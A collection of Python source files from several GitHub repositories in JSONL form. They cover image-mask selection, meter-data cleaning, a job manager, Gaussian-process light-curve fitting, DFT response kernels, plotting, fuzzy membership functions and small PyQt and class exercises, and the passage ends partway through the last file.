+{"seq_id":"15907813457","text":"#!/usr/bin/env python3\nimport os\nimport pygame\nimport sys\nimport glob\nfrom window import Window\nimport numpy as np\nsys.path.append(os.getcwd())\nfrom viewer import fix\nfrom tqdm import tqdm\nfrom PIL import Image\n\n# to generate:\n# grep -vIr \"\\x00\" -- */*/ent.txt > /tmp/ents\n# cat /tmp/ents | sort -t \":\" -k2 -n -r > /tmp/entssort\n\nBASEDIR = sys.argv[1]\n\nwin = Window(1164, 874)\ncc = 0\n\nif len(sys.argv) > 3:\n mask = sys.argv[3]\nelse:\n mask = \"h%03d\"\n\nwhile len(glob.glob((\"imgs/\"+mask+\"*\") % cc)) > 0:\n cc += 1\nprint(\"starting with %d\" % cc)\n\nseen = set([x.split(\"_\", 1)[1] for x in glob.glob(\"imgs/*\")])\n\n# permanent camera occulusions\nEXCLUDE_USERS = [\"807f77aac0daa4b6\", \"84e6a31bffe59bee\"]\n\nseek_fn = None\n#seek_fn = glob.glob(\"imgs/\"+(mask % (cc-1))+\"*\")[0].split(\"_\", 1)[1]\n#print(seek_fn)\n\no = 2\ndat = open(sys.argv[2]).read().strip().split(\"\\n\")\nfor d in tqdm(dat):\n fn = os.path.join(BASEDIR, d.split(\":\")[0].replace(\"/ent.txt\", \"\"))\n dd = sorted(os.listdir(fn))\n if seek_fn is not None:\n #print(dd[1], seek_fn)\n if not dd[1].endswith(seek_fn):\n continue\n seek_fn = None\n\n if dd[1][5:] in seen:\n continue\n if dd[1].split(\"_\")[1] in EXCLUDE_USERS:\n continue\n print(dd)\n\n ii = np.array(Image.open(os.path.join(fn, dd[1])))\n segi = fix(Image.open(os.path.join(fn, dd[2])))\n while 1:\n pii = ii*((10-o)/10) + segi*(o/10)\n win.draw(pii)\n kk = win.getkey()\n if kk == ord(\"z\"):\n suf = dd[1][5:]\n outn = (\"imgs/\"+mask+\"_%s\") % (cc, suf)\n print(\"saving \", outn)\n im = Image.fromarray(ii)\n im.save(outn)\n im = Image.fromarray(segi)\n im.save(outn.replace(\"imgs/\", \"masks/\"))\n cc += 1\n break\n elif kk == pygame.locals.K_UP:\n o = min(10, o+1)\n elif kk == pygame.locals.K_DOWN:\n o = max(0, o-1)\n elif kk == ord(\" \"):\n break\n\n\n\n","repo_name":"commaai/comma10k","sub_path":"tools/selector.py","file_name":"selector.py","file_ext":"py","file_size_in_byte":1833,"program_lang":"python","lang":"en","doc_type":"code","stars":640,"dataset":"github-code","pt":"36"}
+{"seq_id":"1915200176","text":"import numpy as np\nimport pandas as pd \n\n\"\"\"\n Every one of these functions expects a full interval df (so zero and NaN intervals) \n but will only give a predictions for the zero intervals \n\"\"\"\n\ndef sign_change_intervals(interval_df):\n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n sign_change_intervals = np.sign(short_zero_intervals['value_before_start']) == - np.sign(short_zero_intervals['0th_value_after_end'])\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with a sign change is normal\n result.loc[sign_change_intervals[sign_change_intervals].index] = False\n \n return result\n \n \ndef low_consumption_on_both_sides_intervals(interval_df): \n zero_intervals = interval_df.query('interval_value == 0')\n short_zero_intervals = (\n zero_intervals\n .replace({'start':np.nan, 'end': np.nan})\n .dropna(subset = ['0th_value_after_end', 'value_before_start'])\n .query('interval_length == 1')\n )\n low_consumption = (np.abs(short_zero_intervals['value_before_start']) < 0.1) & (np.abs(short_zero_intervals['0th_value_after_end']) < 0.1)\n result = pd.Series(index = zero_intervals.index, dtype = 'object')\n \n # a short zero interval with low consumption on both sides is normal\n result.loc[low_consumption[low_consumption].index] = False\n \n return result\n\ndef collective_error_intervals(interval_df, threshold = 2): \n # count how much each start time occurs\n interval_counts = interval_df.reset_index().groupby('start')[['meterID', 'year']].size()\n # add this to the interval df as a column\n intervals_with_count = interval_df.join(interval_counts.to_frame('count'), on = ['start'])\n\n # only use the intervals with a very high count\n intervals_with_count = intervals_with_count[intervals_with_count['count'] >= 33] \n\n # filter each group of intervals that start on the same moment, only allow intervals with the most common length +- a threshold (in this case 2)\n def filter_groups(df): \n most_common_value = df.interval_length.value_counts().idxmax()\n return df[(df.interval_length >= most_common_value -threshold) & (df.interval_length <= most_common_value + threshold) ]\n intervals_with_count = intervals_with_count.groupby('start_time').apply(filter_groups).droplevel(0)\n \n # each of the intervals that remains is thus a collective data problem and is a data error\n collective_data_problems = pd.Series(index = interval_df.index, dtype = 'object')\n collective_data_problems.loc[intervals_with_count.index] = True\n return collective_data_problems\n ","repo_name":"jankrans/Conditional-Generative-Neural-Networks","sub_path":"repositories/profile-clustering/notebooks/real_data_exploration/handling_zeros_and_nans/zero_intervals.py","file_name":"zero_intervals.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"30199883148","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim: ai ts=4 sts=4 et sw=4 nu\n\"\"\"\n(c) 2015 Ronan Delacroix\nJob Manager Job Abstract Class\n:author: Ronan Delacroix\n\"\"\"\nimport os\nimport logging\nimport mongoengine\nimport mongoengine.signals\nimport tbx\nimport tbx.process\nimport tbx.service\nimport tbx.log\nimport tbx.text\nimport uuid as UUID\nimport traceback\nimport tempfile\nimport shutil\nfrom datetime import datetime, timedelta\nimport jobmanager.common as common\nfrom .host import Host\nfrom tbx.code import cached_property\n\n\njob_status_to_icon = {\n 'new': \"\\u23F8\",\n 'pending': \"\\u23F8\",\n 'running': \"\\u25B6\",\n 'success': \"\\u2605\",\n 'error': \"\\u2716\"\n}\n\n\nclass Job(common.NamedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n\n meta = {\n 'collection': 'jobs',\n 'indexes': [\n 'status',\n 'created',\n ]\n }\n\n status_text = mongoengine.StringField(required=True, default=\"\")\n hostname = mongoengine.StringField()\n completion = mongoengine.IntField(required=True, min_value=0, max_value=100, default=0)\n timeout = mongoengine.IntField(min_value=0, default=43200) # 12 hours\n ttl = mongoengine.IntField(min_value=1, default=1)\n history = mongoengine.ListField(field=mongoengine.DictField(), default=[])\n\n def __str__(self):\n return \"%s %s\" % (self.name, job_status_to_icon.get(self.status, self.status))\n\n @classmethod\n def default_slot_amount(cls):\n \"\"\"\n Returns the default amount of job that can be run at the same time on the same machine/client.\n Override and set to math.inf for no limiting amount.\n You can base that how much CPU cores you have or anything else.\n Default is 1 job at a time by default.\n \"\"\"\n return 1\n\n @cached_property\n def extra_log_arguments(self):\n return {\n 'job_type': self.__class__.__name__,\n 'job_uuid': self.uuid,\n 'job_status': self.status,\n }\n\n def update_status(self, completion=None, text=None):\n if text:\n self.status_text = text\n\n if completion:\n self.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.completion,\n message=self.status_text\n ))\n\n self.update(\n add_to_set__history={'t': datetime.utcnow(), 'm': self.status_text, 'c': self.completion, 's': self.status},\n status=self.status,\n details=self.details,\n completion=self.completion,\n status_text=self.status_text,\n started=self.started,\n finished=self.finished\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n def save_as_successful(self, text=\"Job Successful\"):\n self.update_status(100, text=text)\n self.save() # Saves a other fields\n\n def save_as_error(self, text=\"Job Error\"):\n self.status = 'error'\n self.update_status(text=text)\n self.save()\n\n\nmongoengine.signals.pre_save.connect(common.update_modified)\n\n\nclass JobTask(mongoengine.EmbeddedDocument, common.Runnable, common.LogProxy, common.AutoDocumentable):\n meta = {\n 'abstract': True,\n }\n\n status = mongoengine.StringField(required=True, default=\"pending\",\n choices=('new', 'pending', 'running', 'success', 'error'))\n details = mongoengine.StringField(required=False)\n\n @property\n def job(self):\n if isinstance(self._instance, JobTask):\n return self._instance.job\n return self._instance\n\n @cached_property\n def extra_log_arguments(self):\n extra_log_arguments = {}\n if isinstance(self.job, common.LogProxy):\n extra_log_arguments = self.job.extra_log_arguments\n extra_log_arguments['task'] = self.name\n return extra_log_arguments\n\n def __str__(self):\n return \"%s > %s\" % (self.job, self.name)\n\n def get_hash(self):\n import base64\n import hashlib\n return base64.b64encode(\n hashlib.sha1(mongoengine.EmbeddedDocument.to_json(self, sort_keys=True).encode()).digest()).decode().strip('=').replace(\"+\", \"-\")\n\n def update_status(self, completion=None, text=None):\n # TODO : Review this part // Completion between tasks and jobs is not clear.\n if text:\n self.job.status_text = text\n\n if completion:\n self.job.completion = completion\n\n log = self.log_info\n if self.status == 'error':\n log = self.log_error\n\n log(\"Progress update : {progress:5.1f}% - {message}\".format(\n progress=self.job.completion,\n message=text\n ))\n\n self.job.update(\n add_to_set__history={'t': datetime.utcnow(), 'k': self.name, 'm': text, 'c': completion},\n completion=completion,\n status_text=text\n )\n\n def update_progress(self, completion, text=None):\n self.update_status(completion=completion, text=text)\n\n\ndef make_job(job_name, **kwargs):\n \"\"\"\n Decorator to create a Job from a function.\n Give a job name and add extra fields to the job.\n\n @make_job(\"ExecuteDecJob\",\n command=mongoengine.StringField(required=True),\n output=mongoengine.StringField(default=None))\n def execute(job: Job):\n job.log_info('ExecuteJob %s - Executing command...' % job.uuid)\n result = subprocess.run(job.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n job.output = result.stdout.decode('utf-8') + \" \" + result.stderr.decode('utf-8')\n\n \"\"\"\n def wraps(func):\n kwargs['process'] = func\n job = type(job_name, (Job,), kwargs)\n globals()[job_name] = job\n return job\n return wraps\n","repo_name":"ronhanson/python-jobmanager-common","sub_path":"jobmanager/common/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":5995,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"}
+{"seq_id":"23702290276","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, unicode_literals\n\n__all__ = [\"GPLikelihood\"]\n\nimport numpy as np\n\ntry:\n import george\nexcept ImportError:\n george = None\nelse:\n from george.kernels import Matern32Kernel\n\nfrom ..pipeline import Pipeline\nfrom ..gp_heuristics import estimate_tau\n\n\nclass GPLikelihood(Pipeline):\n\n query_parameters = dict(\n tau_frac=(0.25, False),\n )\n\n def __init__(self, *args, **kwargs):\n if george is None:\n raise ImportError(\"george is required for the GP model\")\n kwargs[\"cache\"] = kwargs.pop(\"cache\", False)\n super(GPLikelihood, self).__init__(*args, **kwargs)\n\n def get_result(self, query, parent_response):\n lcs = [LCWrapper(lc, tau_frac=query[\"tau_frac\"])\n for lc in parent_response.light_curves]\n return dict(model_light_curves=lcs)\n\n\nclass LCWrapper(object):\n\n def __init__(self, lc, dist_factor=10.0, time_factor=0.1, tau_frac=0.25):\n self.time = lc.time\n mu = np.median(lc.flux)\n self.flux = lc.flux / mu - 1.0\n self.ferr = lc.ferr / mu\n\n # Convert to parts per thousand.\n self.flux *= 1e3\n self.ferr *= 1e3\n\n # Estimate the kernel parameters.\n tau = tau_frac * estimate_tau(self.time, self.flux)\n self.kernel = np.var(self.flux) * Matern32Kernel(tau ** 2)\n self.gp = george.GP(self.kernel, solver=george.HODLRSolver)\n self.K_0 = self.gp.get_matrix(self.time)\n self.gp.compute(self.time, self.ferr, seed=1234)\n self.alpha = self.gp.solver.apply_inverse(self.flux)\n\n # Compute the likelihood of the null model.\n self.ll0 = self.lnlike()\n\n # def lnlike(self, model=None):\n # # No model is given. Just evaluate the lnlikelihood.\n # if model is None:\n # return -0.5 * np.dot(self.flux, self.alpha)\n\n # # A model is given, use it to do a linear fit.\n # m = model(self.time)\n # if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n # return 0.0, 0.0, 0.0\n\n # # Compute the inverse variance.\n # Cm = self.gp.solver.apply_inverse(m)\n # S = np.dot(m, Cm)\n # if S <= 0.0:\n # return 0.0, 0.0, 0.0\n\n # # Compute the depth.\n # d = np.dot(m, Cf) / S\n # if not np.isfinite(d):\n # return 0.0, 0.0, 0.0\n\n # # Compute the lnlikelihood.\n # dll = -0.5*np.dot(self.flux-d*m, Cf-d*Cm) - self.ll0\n # if not np.isfinite(dll):\n # return 0.0, 0.0, 0.0\n\n # return dll, d, S\n\n # def predict(self, y=None):\n # if y is None:\n # y = self.flux\n # return self.gp.predict(y, self.time, mean_only=True)\n\n def lnlike_eval(self, y):\n return -0.5 * np.dot(y, self.gp.solver.apply_inverse(y))\n\n def lnlike(self, model=None):\n if model is None:\n return -0.5 * np.dot(self.flux, self.alpha)\n\n # Evaluate the transit model.\n m = model(self.time)\n if m[0] != 0.0 or m[-1] != 0.0 or np.all(m == 0.0):\n return 0.0, 0.0, 0.0\n\n Km = self.gp.solver.apply_inverse(m)\n Ky = self.alpha\n ivar = np.dot(m, Km)\n depth = np.dot(m, Ky) / ivar\n r = self.flux - m*depth\n ll = -0.5 * np.dot(r, Ky - depth * Km)\n return ll - self.ll0, depth, ivar\n\n def predict(self, y=None):\n if y is None:\n y = self.flux\n return np.dot(self.K_0, self.gp.solver.apply_inverse(y))\n","repo_name":"dfm/ketu","sub_path":"ketu/kepler/likelihood.py","file_name":"likelihood.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"36"}
+{"seq_id":"37569237521","text":"def absol(x):\n if x>= 0:\n return x\n elif x < 0:\n return -x\n else:\n return 'slutt å tull'\n\ntall = int(input('Hvilket tall vil du ha absoluttverdien til? '))\nprint(f\"Absoluttverdien til {tall} er\", absol(tall))","repo_name":"jorul/ITGK","sub_path":"ITGK øvinger/Øving 5 uke 41/Varierte funksjoner/a absoluttverdi.py","file_name":"a absoluttverdi.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37349149947","text":"\"\"\"XC density kernels for response function calculations.\"\"\"\n\nimport numpy as np\n\nfrom my_gpaw.response.localft import LocalFTCalculator\nfrom my_gpaw.response.fxc_kernels import AdiabaticFXCCalculator\n\n\ndef get_density_xc_kernel(qpd, gs, context, functional='ALDA',\n rshelmax=-1, rshewmin=None,\n chi0_wGG=None):\n \"\"\"Density-density xc kernels.\n Factory function that calls the relevant functions below.\"\"\"\n\n p = context.print\n nspins = len(gs.nt_sR)\n assert nspins == 1\n\n if functional[0] == 'A':\n # Standard adiabatic kernel\n p('Calculating %s kernel' % functional)\n localft_calc = LocalFTCalculator.from_rshe_parameters(\n gs, context, rshelmax=rshelmax, rshewmin=rshewmin)\n fxc_calculator = AdiabaticFXCCalculator(localft_calc)\n fxc_kernel = fxc_calculator(functional, '00', qpd)\n Kxc_GG = fxc_kernel.get_Kxc_GG()\n\n if qpd.kd.gamma:\n Kxc_GG[0, :] = 0.0\n Kxc_GG[:, 0] = 0.0\n Kxc_sGG = np.array([Kxc_GG])\n elif functional[:2] == 'LR':\n p('Calculating LR kernel with alpha = %s' % functional[2:])\n Kxc_sGG = calculate_lr_kernel(qpd, alpha=float(functional[2:]))\n elif functional == 'Bootstrap':\n p('Calculating Bootstrap kernel')\n Kxc_sGG = get_bootstrap_kernel(qpd, chi0_wGG, context)\n else:\n raise ValueError('Invalid functional for the density-density '\n 'xc kernel:', functional)\n\n return Kxc_sGG[0]\n\n\ndef calculate_lr_kernel(qpd, alpha=0.2):\n \"\"\"Long range kernel: fxc = \\alpha / |q+G|^2\"\"\"\n\n assert qpd.kd.gamma\n\n f_G = np.zeros(len(qpd.G2_qG[0]))\n f_G[0] = -alpha\n f_G[1:] = -alpha / qpd.G2_qG[0][1:]\n\n return np.array([np.diag(f_G)])\n\n\ndef get_bootstrap_kernel(qpd, chi0_wGG, context):\n \"\"\" Bootstrap kernel (see below) \"\"\"\n\n if context.comm.rank == 0:\n chi0_GG = chi0_wGG[0]\n if context.comm.size > 1:\n # If size == 1, chi0_GG is not contiguous, and broadcast()\n # will fail in debug mode. So we skip it until someone\n # takes a closer look.\n context.comm.broadcast(chi0_GG, 0)\n else:\n nG = qpd.ngmax\n chi0_GG = np.zeros((nG, nG), complex)\n context.comm.broadcast(chi0_GG, 0)\n\n return calculate_bootstrap_kernel(qpd, chi0_GG, context)\n\n\ndef calculate_bootstrap_kernel(qpd, chi0_GG, context):\n \"\"\"Bootstrap kernel PRL 107, 186401\"\"\"\n p = context.print\n\n if qpd.kd.gamma:\n v_G = np.zeros(len(qpd.G2_qG[0]))\n v_G[0] = 4 * np.pi\n v_G[1:] = 4 * np.pi / qpd.G2_qG[0][1:]\n else:\n v_G = 4 * np.pi / qpd.G2_qG[0]\n\n nG = len(v_G)\n K_GG = np.diag(v_G)\n\n Kxc_GG = np.zeros((nG, nG), dtype=complex)\n dminv_GG = np.zeros((nG, nG), dtype=complex)\n\n for iscf in range(120):\n dminvold_GG = dminv_GG.copy()\n Kxc_GG = K_GG + Kxc_GG\n\n chi_GG = np.dot(np.linalg.inv(np.eye(nG, nG)\n - np.dot(chi0_GG, Kxc_GG)), chi0_GG)\n dminv_GG = np.eye(nG, nG) + np.dot(K_GG, chi_GG)\n\n alpha = dminv_GG[0, 0] / (K_GG[0, 0] * chi0_GG[0, 0])\n Kxc_GG = alpha * K_GG\n p(iscf, 'alpha =', alpha, flush=False)\n error = np.abs(dminvold_GG - dminv_GG).sum()\n if np.sum(error) < 0.1:\n p('Self consistent fxc finished in %d iterations !' % iscf)\n break\n if iscf > 100:\n p('Too many fxc scf steps !')\n\n return np.array([Kxc_GG])\n","repo_name":"f-fathurrahman/ffr-learns-gpaw","sub_path":"my_gpaw/response/density_kernels.py","file_name":"density_kernels.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"18955742169","text":"import matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nfrom src.experiment.fs_study.setup import classifiers, experiment_setups\nfrom src.features.selection.wrappers import fs_wrappers\nfrom src.utils.file_handling.processors import CsvProcessor\n\nfont = {'family': 'normal',\n 'weight': 'normal',\n 'size': 12}\nrc('font', **{'family': 'sans-serif', 'sans-serif': ['Helvetica']})\n\n## for Palatino and other serif fonts use:\nrc('font', **{'family': 'serif', 'serif': ['Palatino']})\nrc('text', usetex=True)\n\ndata_point_labels = [0.01, 0.02, 0.03, 0.05, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1]\nmetric_positions = [0, 3, 5, 7, 13, 15]\nmarkers = ['d', 'o', 'h', '*', 'P', 'p', 's', 'v', '>', '<']\n\nfor experiment_name in experiment_setups.keys():\n plot_data = {}\n for wrapper in fs_wrappers:\n for classifier in classifiers:\n plot_data[classifier.name] = {}\n val_filename = '_'.join([wrapper.name, classifier.name, \"search\"])\n test_filename = '_'.join([wrapper.name, classifier.name, \"search\", \"test\"])\n print(\"Processing files {0} and {1}\".format(val_filename, test_filename))\n\n val_header, val_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + val_filename)\n test_header, test_data = CsvProcessor().read_file(\n filename='summary/' + experiment_name + \"/\" + test_filename)\n\n if val_header is not None and val_data is not None:\n dataset = ''\n labels = []\n pos = 0\n for i, row in enumerate(val_data):\n if row[0].split('_')[0] != dataset:\n if i == 0:\n dataset = row[0].split('_')[0]\n else:\n plt.title('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n dataset.replace('_', '')]))\n plt.ylabel(r'Quality metrics', fontsize=13)\n plt.xlabel(r'NFEs\\textsubscript{max}', fontsize=13)\n plt.xlim([data_point_labels[0], data_point_labels[-1]])\n plt.ylim(top=1)\n plt.xticks(range(0, 14), data_point_labels)\n plt.tick_params()\n plt.legend(labels=labels, fancybox=False, framealpha=0.9)\n plt.tight_layout()\n plt.grid(b=True, linestyle=':')\n plt.show()\n # plt.savefig('-'.join([experiment_name.replace('_', '-'), wrapper.name, classifier.name,\n # dataset.replace('_', '')]) + \".pdf\",\n # format='pdf', dpi=300)\n plt.close()\n labels = []\n dataset = row[0].split('_')[0]\n pos = 0\n\n if pos in metric_positions:\n scores = [float(score) for score in row[1:]]\n plt.plot(scores, lw=0.75, ms=4, alpha=0.5, marker=markers[metric_positions.index(pos)])\n metric = row[0][row[0].find(dataset) + len(dataset) + 1:].replace('_', '')\n labels.append(metric)\n pos += 1\n plt.close()\n","repo_name":"MarioDudjak/FeatureSelectionWorkflow","sub_path":"reports/visualization/median_search_all_metrics_per_classifier_and_dataset.py","file_name":"median_search_all_metrics_per_classifier_and_dataset.py","file_ext":"py","file_size_in_byte":3498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"42961076277","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n'''this module defines a square by: (based on 1-square.py)\n\n Private instance attribute: size\n Instantiation with optional size: def __init__(self, size=0):\n size must be an integer, otherwise raise a TypeError exception with\n the message size must be an integer\n if size is less than 0, raise a ValueError exception\n with the message size must be >= 0\n\n It also determine the area of the square\n '''\n\n\nclass Square:\n '''A Square class that defines a square and initialize\n the size attribute'''\n def __init__(self, size=0, position=(0, 0)):\n '''Initialize the size and position of a square\n\n Args:\n size(int): Size of the square\n\n '''\n self.size = size\n self.position = position\n\n @property\n def size(self):\n '''A method that retrieve the size of the square'''\n return self.__size\n\n @size.setter\n def size(self, value):\n '''Set the valid value of the size attribute'''\n if isinstance(value, int):\n if value < 0:\n raise ValueError(\"size must be >= 0\")\n self.__size = value\n else:\n raise TypeError(\"size must be an integer\")\n\n @property\n def position(self):\n '''A method that retrieve the size of the square'''\n return self.__position\n\n @position.setter\n def position(self, value):\n \"\"\"Define Setter method for __postion\"\"\"\n if not isinstance(value, tuple) or len(value) != 2:\n raise TypeError(\"position must be a tuple of 2 positive integers\")\n elif not isinstance(value[0], int) or not isinstance(value[1], int):\n raise TypeError(\"position must be a tuple of 2 posetive integers\")\n elif value[1] < 0 or value[0] < 0:\n raise ValueError(\"position must be a tuple of 2 positive integers\")\n else:\n self.__position = value\n\n def area(self):\n '''Determine the area of a square and return it'''\n return self.__size ** 2\n\n def my_print(self):\n \"\"\"Defining my_print method\"\"\"\n if self.__size == 0:\n print()\n else:\n for i in range(self.__position[1]):\n print()\n for i in range(self.__size):\n print(\" \" * self.__position[0], end=\"\")\n print('#' * self.__size)\n","repo_name":"solomonferede1/alx-higher_level_programming","sub_path":"0x06-python-classes/6-square.py","file_name":"6-square.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"11606481940","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass Membership_Function:\n @staticmethod\n def triangle(x, a, m, b):\n \"\"\"\n Retorna a função de pertinência triangular.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência triangular.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo um array de saída do tamnho da entrada.\n first_half = np.logical_and(a < x, x <= m) # Definindo o intervalo de 'subida' da função.\n y[first_half] = (x[first_half] - a) / (m - a) # Definindo os valores da saída para o intervalo de 'subida'.\n second_half = np.logical_and(m <= x, x < b) # Definindo o intervalo de 'descida' da função.\n y[second_half] = (b - x[second_half]) / (b - m) # Definindo os valores da saída para o intervalo de 'descida'.\n return y\n \n @staticmethod\n def trapezoidal(x, a, m, n, b):\n \"\"\"\n Retorna a função de pertinência trapezoidal.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - a: float\n Valor do ponto de início da função.\n - m: float\n Valor do ponto médio esquerdo da função.\n - n: float\n Valor do ponto médio direito da função.\n - b: float\n Valor do ponto de fim da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência trapezoidal.\n \"\"\"\n y = np.zeros(x.shape[0]) # Definindo saída do tamaho da entrada.\n first_part = np.logical_and(a < x, x <= m) # Definindo o intervalo de subida.\n y[first_part] = (x[first_part] - a) / (m - a) # Definindo os valores da saída no intervalo de subida.\n second_part = np.logical_and(m < x, x < n) # Definindo o intervalo entre subida e decida.\n y[second_part] = 1 # Definindo o valor 1 para todo o intervalo entre subida e decida.\n third_part = np.logical_and(n <= x, x < b) # Definindo o intervalo de decida. \n y[third_part] = (b - x[third_part]) / (b - n) # Defininido os valores de saída para o intervalo de saída.\n return y\n \n @staticmethod\n def gaussian(x, k, m):\n \"\"\"\n Retorna a função de pertinência gaussiana.\n\n Parâmetros:\n - x: np.ndarray\n Valores de entrada.\n - k: float\n Valor do parâmetro de largura da função.\n - m: float\n Valor do parâmetro de centro da função.\n\n Retorno:\n - y: np.ndarray\n Valores de saída correspondentes à função de pertinência gaussiana.\n \"\"\"\n k = k / 2\n expoent = (-1) * ((x - m) ** 2) / (k ** 2)\n return np.exp(expoent)\n \n @staticmethod\n def test_functions(type):\n \"\"\"\n Retorna várias funções de pertinência para testes.\n\n Parâmetros:\n - type: int\n Tipo de teste a ser retornado.\n\n Retorno:\n - range: np.ndarray\n Valores de entrada.\n - functions: np.ndarray\n Valores de saída correspondentes às funções de pertinência.\n \"\"\"\n range = np.arange(0, 100, 0.1)\n \n if type == 0: # Retorna uma função de cada tipo de maneira sequêncial\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70),\n Membership_Function.gaussian(range, 10, 85)\n ])\n if type == 1: # Retorna vários triângulos com 'm' iguais\n return range, np.array([\n Membership_Function.triangle(range, 0, 50, 100),\n Membership_Function.triangle(range, 10, 50, 90),\n Membership_Function.triangle(range, 20, 50, 80),\n Membership_Function.triangle(range, 30, 50, 70),\n Membership_Function.triangle(range, 40, 50, 60)\n ])\n if type == 2: # Retorna vários triangulos complementares\n return range, np.array([\n Membership_Function.triangle(range, 0, 0, 20),\n Membership_Function.triangle(range, 0, 20, 40),\n Membership_Function.triangle(range, 20, 40, 60),\n Membership_Function.triangle(range, 40, 60, 80),\n Membership_Function.triangle(range, 60, 80, 100),\n Membership_Function.triangle(range, 80, 100, 100)\n ])\n if type == 3: # Retorna vários trapézios com 'n' e 'm' iguais\n return range, np.array([\n Membership_Function.trapezoidal(range, 0, 40, 60, 100),\n Membership_Function.trapezoidal(range, 10, 40, 60, 90),\n Membership_Function.trapezoidal(range, 20, 40, 60, 80),\n Membership_Function.trapezoidal(range, 30, 40, 60, 70)\n ])\n if type == 4: # Retorna vários trapezios complementares\n return range, np.array([\n Membership_Function.trapezoidal(range, -1, 0, 5, 15),\n Membership_Function.trapezoidal(range, 5, 15, 25, 35),\n Membership_Function.trapezoidal(range, 25, 35, 45, 55),\n Membership_Function.trapezoidal(range, 45, 55, 65, 75),\n Membership_Function.trapezoidal(range, 65, 75, 85, 95),\n Membership_Function.trapezoidal(range, 85, 95, 100, 100)\n ])\n if type == 5: # Retorna várias gaussianas com 'm' iguais\n return range, np.array([\n Membership_Function.gaussian(range, 40, 50),\n Membership_Function.gaussian(range, 30, 50),\n Membership_Function.gaussian(range, 20, 50),\n Membership_Function.gaussian(range, 10, 50)\n ])\n if type == 6: # Retorna várias gaussianas complementares\n return range, np.array([\n Membership_Function.gaussian(range, 20, 20),\n Membership_Function.gaussian(range, 20, 0),\n Membership_Function.gaussian(range, 20, 40),\n Membership_Function.gaussian(range, 20, 60),\n Membership_Function.gaussian(range, 20, 80),\n Membership_Function.gaussian(range, 20, 100)\n ])\n if type == 7: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.trapezoidal(range, 20, 50, 60, 95),\n Membership_Function.gaussian(range, 10, 80)\n ])\n if type == 8: # Retorna testes para opração de união\n return range, np.array([\n Membership_Function.triangle(range, 5, 15, 25),\n Membership_Function.gaussian(range, 10, 30)\n ])\n if type == 9: # Retorna testes para opração de interseção\n return range, np.array([\n Membership_Function.trapezoidal(range, 5, 20, 40, 60),\n Membership_Function.gaussian(range, 20, 50)\n ])","repo_name":"Gustavo01rb/Fuzzy","sub_path":"fuzzy/membership_function.py","file_name":"membership_function.py","file_ext":"py","file_size_in_byte":7507,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"74157388582","text":"import sys\nfrom PyQt5.QtWidgets import QInputDialog, QLineEdit, QApplication, QMainWindow\nfrom listNancy import Ui_Dialog\n\nclass addForm(QMainWindow):\n def __init__(self, parent=None):\n super().__init__(parent)\n self.ui = Ui_Dialog()\n self.ui.setupUi(self)\n self.ui.pushAdd.clicked.connect(self.addlisting)\n self.ui.pushEdit.clicked.connect(self.editlisting)\n self.ui.pushDelete.clicked.connect(self.dellisting)\n self.ui.pushDeleteAll.clicked.connect(self.delallist)\n\n def addlisting(self):\n self.ui.listWidget.addItem(self.ui.lineEdit.text())\n self.ui.lineEdit.setText('')\n self.ui.lineEdit.setFocus()\n\n def editlisting(self):\n row = self.ui.listWidget.currentRow()\n self.ui.listWidget.takeItem(row)\n text, okPressed = QInputDialog.getText(self, \"Get text\", \"New text:\", QLineEdit.Normal, \"\")\n if okPressed and text != '':\n self.ui.listWidget.insertItem(row, str(text))\n\n def dellisting(self):\n self.ui.listWidget.takeItem(self.ui.listWidget.currentRow())\n\n def delallist(self):\n self.ui.listWidget.clear()\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n addApp = addForm()\n addApp.show()\n 